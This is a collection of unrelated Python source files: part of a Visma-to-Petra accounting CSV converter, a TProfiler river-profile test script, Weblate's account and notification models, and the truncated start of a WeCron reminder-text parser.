self.sie_data = sie_data self.default_petra_cc = default_petra_cc # self.parse_tables(account_file, cost_center_file, project_file) self.account = CSVDict(account_file) self.cost_center = CSVDict(cost_center_file) self.project = CSVDict(project_file) self.table = [] self.ver_month = None def populate_output_table(self): # pylint: disable=too-many-locals,too-many-branches,too-many-statements # pylint: disable=invalid-name """Extract interesting informatin from the Sie data and form output""" header = ['', 'CC', 'Account', 'Narrative', 'Reference', 'Date', 'Dt', 'Ct'] self.table.append(header) program = self.sie_data.get_data('#PROGRAM')[0].data[0].split()[0] verifications = self.sie_data.get_data('#VER') ver_date = next(v.verdatum for v in verifications if v.verdatum.has_date) self.ver_month = ver_date.format("%Y-%m") description = "Imported from {} {}".format(program, self.ver_month) checksum = format(sum(ver.sum_debit() for ver in verifications), '.2f').rstrip('0').rstrip('.').replace('.',',') day = calendar.monthrange(ver_date.year, ver_date.month)[1] last_date_month = "{}/{:02}/{}".format(day, ver_date.month, ver_date.year) self.table.append(['B', description, checksum, last_date_month, '', '', '', '']) for ver in verifications: if not ver.in_balance(): raise Exception('Inte i balans:', ver) """ # Contains 'Swetzén' if ver.serie == 'A' and ver.vernr == '170071': print(ver) # Contains stange characters if ver.serie == 'C' and ver.vernr == '170058': print(ver) # CC with 'XXXX' if ver.serie == 'C' and ver.vernr == '170064': print(ver) # Rounding error? if ver.serie == 'C' and ver.vernr == '170067': print(ver) """ ref = "Visma Ver {}{}".format(ver.serie, ver.vernr) text = "{} - {}".format(ref, ver.vertext) date = ver.verdatum.format("%d/%m/%Y") self.table.append(['J', text, 'GL', 'STD', 'SEK', '1', date, '']) narr = ver.vertext # Default for trans in ver.trans_list: (visma_cc, visma_proj) = _parse_trans_objects(trans.objekt) if not visma_proj or visma_proj == 'P-32000000': # Use visma_cc instead if not visma_cc: # Use default cc = self.default_petra_cc else: cc = self.cost_center[str(visma_cc)]['P_CC'] else: cc = self.project[str(visma_proj)]['P_CC'] acct = self.account[str(trans.kontonr)]['P_Acct'] if trans.transtext and trans.kvantitet: kvantitet = format(trans.kvantitet, '.2f').rstrip('0').rstrip('.').replace('.',',') narr = "{} {}".format(trans.transtext, kvantitet) elif trans.transtext: narr = trans.transtext dt = trans.debit ct = trans.credit self.table.append(['T', cc, acct, narr, ref, date, dt, ct]) def print_output(self): """Print csv output to stdout""" print("\n".join(','.join(str(r) for r in row) for row in self.table)) def write_output(self, filename=None, overwrite=False): """Write csv to file, abort if it already exists""" writemode = 'w' if overwrite else 'x' try: for encoding in ['utf_8']: if not filename: filename = 'CSV/PYTHON/VtP_' + self.ver_month + encoding + '.csv' try: with open(filename, writemode, newline='', encoding=encoding) as csvfile: csvwriter = csv.writer(csvfile, delimiter=';') csvwriter.writerows(self.table) # print("Encoding with ", encoding, "successful!") except UnicodeEncodeError as err: print("Encoding failed: ", err) os.remove(filename) except FileExistsError: sys.exit("Kan inte skriva " + filename + ", filen finns redan.")
geolovic/TProfiler
test/06_TProfiler_test.py
# -*- coding: utf-8 -*- """ José Vicente Pérez Granada University (Spain) March, 2017 Testing suite for profiler.py Last modified: 19 June 2017 """ import time import profiler as p import praster as pr import numpy as np import matplotlib.pyplot as plt print("Tests for TProfiler methods") def test01(): """ Creates a TProfiler from an array with profile_data Test for get_x, get_y """ inicio = time.time() print("=" * 40) print("Test 01 para TProfiler") print("Testing functions get_x(), get_y()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Test 01 get and print x and y arrays fig = plt.figure() ax1 = fig.add_subplot(121) ax2 = fig.add_subplot(122) xi1 = perfil.get_x(True) yi1 = perfil.get_y(True) xi2 = perfil.get_x(False) yi2 = perfil.get_y(False) ax1.plot(xi1, yi1) ax2.plot(xi2, yi2) ax1.set_title("head = True") ax2.set_title("head = False") fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test02(): """ Creates a TProfiler from an array with profile_data Test for get_l, get_z """ inicio = time.time() print("=" * 40) print("Test 02 para TProfiler") print("Testing functions get_l(), get_z()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Test 01 get and print x and y arrays fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) li1 = perfil.get_l(True) zi1 = perfil.get_z(True) ax1.plot(li1, zi1) ax1.set_title("head = True") li2 = perfil.get_l(False) zi2 = perfil.get_z(False) ax2.plot(li2, zi2) ax2.set_title("head = False") zi3 = perfil.get_z(True, True) ax3.plot(li1, zi3) ax3.set_title("Relative elevations, head = True") zi4 = perfil.get_z(False, True) ax4.plot(li2, zi4) ax4.set_title("Relative elevations, head = False") fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test03(): """ Creates a TProfiler from an array with profile_data Test for raw_elevations and smooth """ inicio = time.time() print("=" * 40) print("Test 03 para TProfiler") print("Testing functions smooth() and get_raw_z()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Print raw elevations vs peaks removed elevations fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(121) ax2 = fig.add_subplot(122) li = perfil.get_l(True) zi = perfil.get_z(True) raw_zi = perfil.get_raw_z(True) ax1.plot(li, zi, label="Peaks removed") ax1.plot(li, raw_zi, label="Raw elevations") ax1.set_title("Raw elevations vs peak removed") ax1.legend() ax1.set_xlim((6850, 8950)) ax1.set_ylim((950, 1050)) # Test for smooth function distance = 0 for n in range(5): li = perfil.get_l(True) zi = perfil.get_z(True) perfil.smooth(distance) ax2.plot(li, zi, label=str(distance) + " m") distance += 50 ax2.set_title("Smooth with different distances") ax2.legend() ax2.set_xlim((8000, 9000)) ax2.set_ylim((950, 1000)) fig.tight_layout() plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test04(): """ Creates a TProfiler from an array with profile_data Test for get_area and get_slopes """ inicio = time.time() print("=" * 40) print("Test 04 para TProfiler") print("Testing functions get_area() and get_slopes()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) for ax in (ax1, ax2, ax3, ax4): ax.set_xscale("log") ax.set_yscale("log") ax.set_xlim((1000000, 100000000)) ax.set_ylim((0.001, 1)) ai = perfil.get_area(True) s1 = perfil.get_slope() ax1.plot(ai, s1, "b+") ax1.set_title("Raw slopes (all)") s2 = perfil.get_slope(threshold=0.9) ax2.plot(ai, s2, "b+") ax2.set_title("Slopes with threshold >= 0.9") s3, lq3 = perfil.get_slope(threshold=0.9, lq=True) ax3.plot(ai, lq3, "r+") ax3.plot(ai, s3, "b+") ax3.set_title("Slopes and low quality slopes (threshold 0.9)") s4, lq4 = perfil.get_slope(threshold=0.9, lq=True, head=True) a2 = perfil.get_area(head=True) ax4.plot(a2, lq4, "r+") ax4.plot(a2, s4, "b+") ax4.set_title("Example 3 with head=True") fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test05(): """ Creates a TProfiler from an array with profile_data Test for calculate slopes """ inicio = time.time() print("=" * 40) print("Test 05 para TProfiler") print("Testing functions calculate slopes") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 4 # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) for n in range(1, 9, 2): ax1 = fig.add_subplot(4, 2, n) ax2 = fig.add_subplot(4, 2, n+1) perfil.calculate_slope(reg_points) si = perfil.get_slope() ai = perfil.get_area() ax1.plot(ai, si, "b+") ax1.set_xscale("log") ax1.set_yscale("log") ax1.set_xlim((1000000, 100000000)) ax1.set_ylim((0.001, 1)) ax1.set_title("reg_points = " + str(reg_points) + " (normal elevations)") perfil.calculate_slope(reg_points, True) si = perfil.get_slope(0.9) ax2.plot(ai, si, "b+") ax2.set_xscale("log") ax2.set_yscale("log") ax2.set_xlim((1000000, 100000000)) ax2.set_ylim((0.001, 1)) ax2.set_title("reg_points = " + str(reg_points) + " (raw elevations)") reg_points += 4 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test06(): """ Creates a TProfiler from an array with profile_data Test for calculate_chi() and get_chi() """ inicio = time.time() print("=" * 40) print("Test 06 para TProfiler") print("Testing functions get_chi() and calculate_chi()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure() theta = 0.35 for n in range(1, 10): ax = fig.add_subplot(3, 3, n) perfil.thetaref = theta perfil.calculate_chi() chi = perfil.get_chi(False, True) zi = perfil.get_z(False, True) ax.plot(chi, zi) ax.set_title("Thetaref = {0:.2f}".format(theta)) theta += 0.05 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test07(): """ Creates a TProfiler from an array with profile_data Test for get_ksn() """ inicio = time.time() print("=" * 40) print("Test 07 para TProfiler") print("Testing function get_ksn()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) # Get slope area and plot in log scale fig = plt.figure(figsize=(12, 6)) ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) li = perfil.get_l(True) ksn1 = perfil.get_ksn() ax1.plot(li, ksn1, "b+") ax1.set_title("Raw ksn (all)") ksn2 = perfil.get_ksn(threshold=0.9) ax2.plot(li, ksn2, "b+") ax2.set_title("Ksn with threshold >= 0.9") ksn3, lq3 = perfil.get_ksn(threshold=0.9, lq=True) ax3.plot(li, lq3, "r+") ax3.plot(li, ksn3, "b+") ax3.set_title("Ksn and low quality ksn (threshold 0.9)") ksn4, lq4 = perfil.get_ksn(threshold=0.9, lq=True, head=False) l2 = perfil.get_l(head=False) ax4.plot(l2, lq4, "r+") ax4.plot(l2, ksn4, "b+") ax4.set_title("Example 3 with head=False") fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test08(): """ Creates a TProfiler from an array with profile_data Test for calculate_ksn """ inicio = time.time() print("=" * 40) print("Test 08 para TProfiler") print("Testing functions calculate_ksn()") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 4 fig = plt.figure(figsize=(12, 6)) for n in range(1, 9, 2): ax1 = fig.add_subplot(4, 2, n) ax2 = fig.add_subplot(4, 2, n + 1) perfil.calculate_ksn(reg_points) ksn = perfil.get_ksn() li = perfil.get_l() ax1.plot(li, ksn) ax1.set_title("KSN with reg_points = " + str(reg_points) + " (normal elevations)") perfil.calculate_ksn(reg_points, raw_z=True) ksn = perfil.get_ksn() ax2.plot(li, ksn) ax2.set_title("KSN with reg_points = " + str(reg_points) + " (raw elevations)") reg_points += 4 fig.tight_layout(pad=1) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) def test09(): """ Creates a TProfiler from an array with profile_data Test for calculate_ksn """ inicio = time.time() print("=" * 40) print("Test 09 para TProfiler") print("Testing ksn and SL plots") print("Test in progress...") # Test parameters pf_data = np.load("data/in/darro_pfdata.npy") dem = "data/in/darro25.tif" demraster = pr.open_raster(dem) srs = demraster.proj cellsize = demraster.cellsize # Creates the profile perfil = p.TProfile(pf_data, cellsize, srs=srs) reg_points = 12 fig = plt.figure() ax = fig.add_subplot(111) perfil.calculate_ksn(reg_points=reg_points) perfil.calculate_slope(reg_points=reg_points) li = perfil.get_l() slope = perfil.get_slope() ksn = perfil.get_ksn() sl = slope * li sl, = ax.plot(li, sl) ax.set_ylabel("SL index") ax.set_xlabel("Distance (m)") twax = ax.twinx() ksn, = twax.plot(li, ksn, color="r") twax.set_ylabel("Ksn index") twax.legend((sl, ksn), ("SL", "ksn")) plt.show() fin = time.time() print("Test finalizado en " + str(fin - inicio) + " segundos") print("=" * 40) test01() test02() test03() test04() test05() test06() test07() test08() test09()
quinox/weblate
weblate/accounts/models.py
# -*- coding: utf-8 -*- # # Copyright © 2012 - 2015 Michal Čihař <michal@cihar.com> # # This file is part of Weblate <http://weblate.org/> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os import sys import binascii from smtplib import SMTPException from django.db import models from django.dispatch import receiver from django.conf import settings from django.contrib.auth.signals import user_logged_in from django.db.models.signals import post_save, post_migrate from django.utils.translation import ugettext_lazy as _ from django.contrib.auth.models import Group, User, Permission from django.utils import translation as django_translation from django.template.loader import render_to_string from django.core.mail import EmailMultiAlternatives, get_connection from django.utils.translation import LANGUAGE_SESSION_KEY from social.apps.django_app.default.models import UserSocialAuth from weblate.lang.models import Language from weblate.trans.site import get_site_url, get_site_domain from weblate.accounts.avatar import get_user_display from weblate.trans.util import report_error from weblate.trans.signals import user_pre_delete from weblate import VERSION from weblate.logger import LOGGER from weblate.appsettings import ANONYMOUS_USER_NAME, SITE_TITLE def send_mails(mails): """Sends multiple mails in single connection.""" try: connection = get_connection() connection.send_messages(mails) except SMTPException as error: LOGGER.error('Failed to send email: %s', error) report_error(error, sys.exc_info()) def get_author_name(user, email=True): """Returns formatted author name with email.""" # Get full name from database full_name = user.first_name # Use username if full name is empty if full_name == '': full_name = user.username # Add email if we are asked for it if not email: return full_name return '%s <%s>' % (full_name, user.email) def notify_merge_failure(subproject, error, status): ''' Notification on merge failure. ''' subscriptions = Profile.objects.subscribed_merge_failure( subproject.project, ) users = set() mails = [] for subscription in subscriptions: mails.append( subscription.notify_merge_failure(subproject, error, status) ) users.add(subscription.user_id) for owner in subproject.project.owners.all(): mails.append( owner.profile.notify_merge_failure( subproject, error, status ) ) # Notify admins mails.append( get_notification_email( 'en', 'ADMINS', 'merge_failure', subproject, { 'subproject': subproject, 'status': status, 'error': error, } ) ) send_mails(mails) def notify_new_string(translation): ''' Notification on new string to translate. ''' mails = [] subscriptions = Profile.objects.subscribed_new_string( translation.subproject.project, translation.language ) for subscription in subscriptions: mails.append( subscription.notify_new_string(translation) ) send_mails(mails) def notify_new_language(subproject, language, user): ''' Notify subscribed users about new language requests ''' mails = [] subscriptions = Profile.objects.subscribed_new_language( subproject.project, user ) users = set() for subscription in subscriptions: mails.append( subscription.notify_new_language(subproject, language, user) ) users.add(subscription.user_id) for owner in subproject.project.owners.all(): mails.append( owner.profile.notify_new_language( subproject, language, user ) ) # Notify admins mails.append( get_notification_email( 'en', 'ADMINS', 'new_language', subproject, { 'language': language, 'user': user, }, user=user, ) ) send_mails(mails) def notify_new_translation(unit, oldunit, user): ''' Notify subscribed users about new translation ''' mails = [] subscriptions = Profile.objects.subscribed_any_translation( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_any_translation(unit, oldunit) ) send_mails(mails) def notify_new_contributor(unit, user): ''' Notify about new contributor. ''' mails = [] subscriptions = Profile.objects.subscribed_new_contributor( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_contributor( unit.translation, user ) ) send_mails(mails) def notify_new_suggestion(unit, suggestion, user): ''' Notify about new suggestion. ''' mails = [] subscriptions = Profile.objects.subscribed_new_suggestion( unit.translation.subproject.project, unit.translation.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_suggestion( unit.translation, suggestion, unit ) ) send_mails(mails) def notify_new_comment(unit, comment, user, report_source_bugs): ''' Notify about new comment. ''' mails = [] subscriptions = Profile.objects.subscribed_new_comment( unit.translation.subproject.project, comment.language, user ) for subscription in subscriptions: mails.append( subscription.notify_new_comment(unit, comment, user) ) # Notify upstream if comment.language is None and report_source_bugs != '': send_notification_email( 'en', report_source_bugs, 'new_comment', unit.translation, { 'unit': unit, 'comment': comment, 'subproject': unit.translation.subproject, }, user=user, ) send_mails(mails) def get_notification_email(language, email, notification, translation_obj=None, context=None, headers=None, user=None, info=None): ''' Renders notification email. ''' cur_language = django_translation.get_language() context = context or {} headers = headers or {} references = None if 'unit' in context: unit = context['unit'] references = '{0}/{1}/{2}/{3}'.format( unit.translation.subproject.project.slug, unit.translation.subproject.slug, unit.translation.language.code, unit.id ) if references is not None: references = '<{0}@{1}>'.format(references, get_site_domain()) headers['In-Reply-To'] = references headers['References'] = references try: if info is None: info = translation_obj.__unicode__() LOGGER.info( 'sending notification %s on %s to %s', notification, info, email ) # Load user language if language is not None: django_translation.activate(language) # Template name context['subject_template'] = 'mail/{}_subject.txt'.format( notification ) # Adjust context context['current_site_url'] = get_site_url() if translation_obj is not None: context['translation'] = translation_obj context['translation_url'] = get_site_url( translation_obj.get_absolute_url() ) context['site_title'] = SITE_TITLE # Render subject subject = render_to_string( context['subject_template'], context ).strip() # Render body body = render_to_string( 'mail/{}.txt'.format(notification), context ) html_body = render_to_string( 'mail/{}.html'.format(notification), context ) # Define headers headers['Auto-Submitted'] = 'auto-generated' headers['X-AutoGenerated'] = 'yes' headers['Precedence'] = 'bulk' headers['X-Mailer'] = 'Weblate {}'.format(VERSION) # Reply to header if user is not None: headers['Reply-To'] = user.email # List of recipients if email == 'ADMINS': emails = [a[1] for a in settings.ADMINS] else: emails = [email] # Create message email = EmailMultiAlternatives( settings.EMAIL_SUBJECT_PREFIX + subject, body, to=emails, headers=headers, ) email.attach_alternative( html_body, 'text/html' ) # Return the mail return email finally: django_translation.activate(cur_language) def send_notification_email(language, email, notification, translation_obj=None, context=None, headers=None, user=None, info=None): ''' Renders and sends notification email. ''' email = get_notification_email( language, email, notification, translation_obj, context, headers, user, info ) send_mails([email]) class VerifiedEmail(models.Model): ''' Storage for verified emails from auth backends. ''' social = models.ForeignKey(UserSocialAuth) email = models.EmailField(max_length=254) def __unicode__(self): return u'{0} - {1}'.format( self.social.user.username, self.email ) class ProfileManager(models.Manager): ''' Manager providing shortcuts for subscription queries. ''' # pylint: disable=W0232 def subscribed_any_translation(self, project, language, user): return self.filter( subscribe_any_translation=True, subscriptions=project, languages=language ).exclude( user=user ) def subscribed_new_language(self, project, user): return self.filter( subscribe_new_language=True, subscriptions=project, ).exclude( user=user ) def subscribed_new_string(self, project, language): return self.filter( subscribe_new_string=True, subscriptions=project, languages=language ) def subscribed_new_suggestion(self, project, language, user): ret = self.filter( subscribe_new_suggestion=True, subscriptions=project, languages=language ) # We don't want to filter out anonymous user if user is not None and user.is_authenticated(): ret = ret.exclude(user=user) return ret def subscribed_new_contributor(self, project, language, user): return self.filter( subscribe_new_contributor=True, subscriptions=project, languages=language ).exclude( user=user ) def subscribed_new_comment(self, project, language, user): ret = self.filter( subscribe_new_comment=True, subscriptions=project ).exclude( user=user ) # Source comments go to every subscriber if language is not None: ret = ret.filter(languages=language) return ret def subscribed_merge_failure(self, project): return self.filter(subscribe_merge_failure=True, subscriptions=project) class Profile(models.Model): ''' User profiles storage. ''' user = models.OneToOneField(User, unique=True, editable=False) language = models.CharField( verbose_name=_(u"Interface Language"), max_length=10, choices=settings.LANGUAGES ) languages = models.ManyToManyField( Language, verbose_name=_('Translated languages'), blank=True, help_text=_('Choose languages to which you can translate.') ) secondary_languages = models.ManyToManyField( Language, verbose_name=_('Secondary languages'), related_name='secondary_profile_set', blank=True, ) suggested = models.IntegerField(default=0, db_index=True) translated = models.IntegerField(default=0, db_index=True) hide_completed = models.BooleanField( verbose_name=_('Hide completed translations on dashboard'), default=False ) secondary_in_zen = models.BooleanField( verbose_name=_('Show secondary translations in zen mode'), default=True ) hide_source_secondary = models.BooleanField( verbose_name=_('Hide source if there is secondary language'), default=False ) subscriptions = models.ManyToManyField( 'trans.Project', verbose_name=_('Subscribed projects'), blank=True, ) subscribe_any_translation = models.BooleanField( verbose_name=_('Notification on any translation'), default=False ) subscribe_new_string = models.BooleanField( verbose_name=_('Notification on new string to translate'), default=False ) subscribe_new_suggestion = models.BooleanField( verbose_name=_('Notification on new suggestion'), default=False ) subscribe_new_contributor = models.BooleanField( verbose_name=_('Notification on new contributor'), default=False ) subscribe_new_comment = models.BooleanField( verbose_name=_('Notification on new comment'), default=False ) subscribe_merge_failure = models.BooleanField( verbose_name=_('Notification on merge failure'), default=False ) subscribe_new_language = models.BooleanField( verbose_name=_('Notification on new language request'), default=False ) SUBSCRIPTION_FIELDS = ( 'subscribe_any_translation', 'subscribe_new_string', 'subscribe_new_suggestion', 'subscribe_new_contributor', 'subscribe_new_comment', 'subscribe_merge_failure', 'subscribe_new_language', ) objects = ProfileManager() def __unicode__(self): return self.user.username def get_user_display(self): return get_user_display(self.user) def get_user_display_link(self): return get_user_display(self.user, True, True) def get_user_name(self): return get_user_display(self.user, False) @models.permalink def get_absolute_url(self): return ('user_page', (), { 'user': self.user.username }) @property def last_change(self): ''' Returns date of last change user has done in Weblate. ''' try: return self.user.change_set.all()[0].timestamp except IndexError: return None def notify_user(self, notification, translation_obj, context=None, headers=None, user=None): ''' Wrapper for sending notifications to user. ''' if context is None: context = {} if headers is None: headers = {} # Check whether user is still allowed to access this project if not translation_obj.has_acl(self.user): return # Generate notification return get_notification_email( self.language, self.user.email, notification, translation_obj, context, headers, user=user ) def notify_any_translation(self, unit, oldunit): ''' Sends notification on translation. ''' if oldunit.translated: template = 'changed_translation' else: template = 'new_translation' return self.notify_user( template, unit.translation, { 'unit': unit, 'oldunit': oldunit, } ) def notify_new_language(self, subproject, language, user): ''' Sends notification on new language request. ''' return self.notify_user( 'new_language', subproject, { 'language': language, 'user': user, }, user=user ) def notify_new_string(self, translation): ''' Sends notification on new strings to translate. ''' return self.notify_user( 'new_string', translation, ) def notify_new_suggestion(self, translation, suggestion, unit): ''' Sends notification on new suggestion. ''' return self.notify_user( 'new_suggestion', translation, { 'suggestion': suggestion, 'unit': unit, } ) def notify_new_contributor(self, translation, user): ''' Sends notification on new contributor. ''' return self.notify_user( 'new_contributor', translation, { 'user': user, } ) def notify_new_comment(self, unit, comment, user): ''' Sends notification about new comment. ''' return self.notify_user( 'new_comment', unit.translation, { 'unit': unit, 'comment': comment, 'subproject': unit.translation.subproject, }, user=user, ) def notify_merge_failure(self, subproject, error, status): ''' Sends notification on merge failure. ''' return self.notify_user( 'merge_failure', subproject, { 'subproject': subproject, 'error': error, 'status': status, } ) @property def full_name(self): ''' Returns user's full name. ''' return self.user.first_name def set_lang(request, profile): """ Sets session language based on user preferences. """ request.session[LANGUAGE_SESSION_KEY] = profile.language @receiver(user_logged_in) def post_login_handler(sender, request, user, **kwargs): ''' Signal handler for setting user language and migrating profile if needed. ''' # Warning about setting password if (getattr(user, 'backend', '').endswith('.EmailAuth') and not user.has_usable_password()): request.session['show_set_password'] = True # Ensure user has a profile profile = Profile.objects.get_or_create(user=user)[0] # Migrate django-registration based verification to python-social-auth if (user.has_usable_password() and not user.social_auth.filter(provider='email').exists()): social = user.social_auth.create( provider='email', uid=user.email, ) VerifiedEmail.objects.create( social=social, email=user.email, ) # Set language for session based on preferences set_lang(request, profile) def create_groups(update): ''' Creates standard groups and gives them permissions. ''' guest_group, created = Group.objects.get_or_create(name='Guests') if created or update: guest_group.permissions.add( Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_suggestion'), ) group, created = Group.objects.get_or_create(name='Users') if created or update: group.permissions.add( Permission.objects.get(codename='upload_translation'), Permission.objects.get(codename='overwrite_translation'), Permission.objects.get(codename='save_translation'), Permission.objects.get(codename='save_template'), Permission.objects.get(codename='accept_suggestion'), Permission.objects.get(codename='delete_suggestion'), Permission.objects.get(codename='vote_suggestion'), Permission.objects.get(codename='ignore_check'), Permission.objects.get(codename='upload_dictionary'), Permission.objects.get(codename='add_dictionary'), Permission.objects.get(codename='change_dictionary'), Permission.objects.get(codename='delete_dictionary'), Permission.objects.get(codename='lock_translation'), Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_comment'), Permission.objects.get(codename='add_suggestion'), Permission.objects.get(codename='use_mt'), ) owner_permissions = ( Permission.objects.get(codename='author_translation'), Permission.objects.get(codename='upload_translation'), Permission.objects.get(codename='overwrite_translation'), Permission.objects.get(codename='commit_translation'), Permission.objects.get(codename='update_translation'), Permission.objects.get(codename='push_translation'), Permission.objects.get(codename='automatic_translation'), Permission.objects.get(codename='save_translation'), Permission.objects.get(codename='save_template'), Permission.objects.get(codename='accept_suggestion'), Permission.objects.get(codename='vote_suggestion'), Permission.objects.get(codename='override_suggestion'), Permission.objects.get(codename='delete_comment'), Permission.objects.get(codename='delete_suggestion'), Permission.objects.get(codename='ignore_check'), Permission.objects.get(codename='upload_dictionary'), Permission.objects.get(codename='add_dictionary'), Permission.objects.get(codename='change_dictionary'), Permission.objects.get(codename='delete_dictionary'), Permission.objects.get(codename='lock_subproject'), Permission.objects.get(codename='reset_translation'), Permission.objects.get(codename='lock_translation'), Permission.objects.get(codename='can_see_git_repository'), Permission.objects.get(codename='add_comment'), Permission.objects.get(codename='delete_comment'), Permission.objects.get(codename='add_suggestion'), Permission.objects.get(codename='use_mt'), Permission.objects.get(codename='edit_priority'), Permission.objects.get(codename='edit_flags'), Permission.objects.get(codename='manage_acl'), Permission.objects.get(codename='download_changes'), Permission.objects.get(codename='view_reports'), ) group, created = Group.objects.get_or_create(name='Managers') if created or update: group.permissions.add(*owner_permissions) group, created = Group.objects.get_or_create(name='Owners') if created or update: group.permissions.add(*owner_permissions) created = True try: anon_user = User.objects.get( username=ANONYMOUS_USER_NAME, ) created = False if anon_user.is_active: raise ValueError( 'Anonymous user ({}) already exists and enabled, ' 'please change ANONYMOUS_USER_NAME setting.'.format( ANONYMOUS_USER_NAME, ) ) except User.DoesNotExist: anon_user = User.objects.create( username=ANONYMOUS_USER_NAME, is_active=False, ) if created or update: anon_user.set_unusable_password() anon_user.groups.clear() anon_user.groups.add(guest_group) def move_users(): ''' Moves users to default group. ''' group = Group.objects.get(name='Users') for user in User.objects.all(): user.groups.add(group) def remove_user(user): ''' Removes user account. ''' # Send signal (to commit any pending changes) user_pre_delete.send(instance=user, sender=user.__class__) # Change username user.username = 'deleted-{0}'.format(user.pk) while User.objects.filter(username=user.username).exists(): user.username = 'deleted-{0}-{1}'.format( user.pk, binascii.b2a_hex(os.urandom(5)) ) # Remove user information user.first_name = 'Deleted User' user.last_name = '' user.email = 'noreply@weblate.org' # Disable the user user.is_active = False user.set_unusable_password() user.save() # Remove all social auth associations user.social_auth.all().delete() @receiver(post_migrate) def sync_create_groups(sender, **kwargs): ''' Create groups on syncdb. ''' if sender.label == 'accounts': create_groups(False) @receiver(post_save, sender=User) def create_profile_callback(sender, instance, created=False, **kwargs): ''' Automatically adds user to Users group. ''' if created: # Add user to Users group if it exists try: group = Group.objects.get(name='Users') instance.groups.add(group) except Group.DoesNotExist: pass
polyrabbit/WeCron
WeCron/wxhook/todo_parser/__init__.py
#coding: utf-8 from __future__ import unicode_literals, absolute_import import logging import json from django.utils.dateparse import parse_datetime from django.utils import timezone from wechatpy.exceptions import WeChatClientException from common import wechat_client from .local_parser import LocalParser from remind.models import Remind from .exceptions import ParseError logger = logging.getLogger(__name__) def parse(text, **kwargs): """Returns a Remind""" # Try to parse by rules and then turn to wechat API since wechat API is unstable and inaccurate. logger.info('Trying to parse "%s" using rules.', text) reminder = LocalParser().parse_by_rules(text) if not reminder: logger.info('Failed to parse time from "%s" using rules, try wechat api.', text) reminder = parse_by_wechat_api(text, **kwargs) if reminder.time <= timezone.now(): # GMT and UTC time can compare with each other raise ParseError('/:no%s已经过去了,请重设一个将来的提醒。\n\n消息: %s' % ( reminder.time.strftime('%Y-%m-%d %H:%M'), text)) return reminder def parse_by_wechat_api(text, **kwargs): """ { "errcode": 0, "query": "提醒我上午十点开会", "semantic": { "details": { "answer": "", "context_info": {}, "datetime": { "date": "2015-12-23", "date_lunar": "2015-11-13", "time": "10:00:00", "time_ori": "上午十点", "type": "DT_ORI", "week": "3" }, "event": "开会", "hit_str": "提醒 我 上午 十点 开会 ", 